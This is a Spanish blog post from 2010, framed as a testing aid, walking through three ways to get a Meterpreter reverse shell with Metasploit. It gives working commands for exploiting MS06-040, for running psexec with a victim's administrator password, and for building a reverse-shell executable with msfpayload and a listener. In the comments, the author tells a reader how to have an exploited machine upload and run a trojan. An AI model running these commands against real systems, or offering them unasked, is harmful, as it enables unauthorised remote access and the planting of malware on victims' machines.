martes, 19 de enero de 2010

Obteniendo una Shell de Meterpreter

Con el objeto de simplificar futuros posts relacionados a MetaSploit, vamos a ver 3 formas sencillas de obtener una shell de Meterpreter. Primero explotando una vulnerabilidad, luego utilizando el comando "psexec", y finalmente creando un payload para que lo ejecute la víctima.

1. Explotando una Vulnerabilidad

Podemos listar los exploits con el comando "show exploits", o buscarlos con por una palabra clave con "search". Las conexiones reversas por default utilizan el puerto 4444, si queremos cambiarlo podemos hacerlo con "set LPORT 80", por ejemplo.

use exploit/windows/smb/ms06_040_netapi
set RHOST 10.10.0.20
set PAYLOAD windows/metepreter/reverse_tcp
set LHOST 10.10.0.10
exploit

2. Utilizando PSEXEC

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitirá ejecutar un payload, en este caso Meterpreter:

use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 10.10.0.20
set LHOST 10.10.0.10
set SMBUser Administrador
set SMBPass letmein
exploit

3. Creando un Payload Ejecutable

Otra forma, es crear un binario con el payload de Meterpreter y copiarlo a la víctima, en este caso "meterpreter.exe". Luego dejamos escuchando por la conexión reversa, y ejecutamos el binario para generar la conexión:

# creamos el binario
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.0.10 X > meterpreter.exe

# dejamos escuchando por la conexión reversa
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.0.10 E

Si alguien conoce otra forma sencilla, siempre con el propósito del testing, por favor deje algún comentario.

3 comentarios:

Anónimo dijo...

Hola, felicitaciones por el blog y el contenido.
Es posible crear un payload con metasploit para que una vez explotada la vulnerabilidad se ejecute otro binario ademas de meterpreter, como un troyano por ejemplo?

saludos!

Leonardo Pigñer dijo...

Hola Anónimo, gracias por las felicitaciones :)

Lo que podrías hacer es crear un script de meterpreter que se ejecute cuando se explota la vulnerabilidad, para que suba el binario y lo ejecute en la victima.

Fijate en "Meterpreter Scripting" de:
http://www.offensive-security.com/metasploit-unleashed/

Seguramente en los próximos dias voy a escribir algún tutorial sencillo sobre scripting.

Saludos,
Leonardo

mvelazco dijo...

gracias por la respuesta. Fue un lapsus el ser anonimo. Espero el post de scripting!!

saludos.

LinkWithin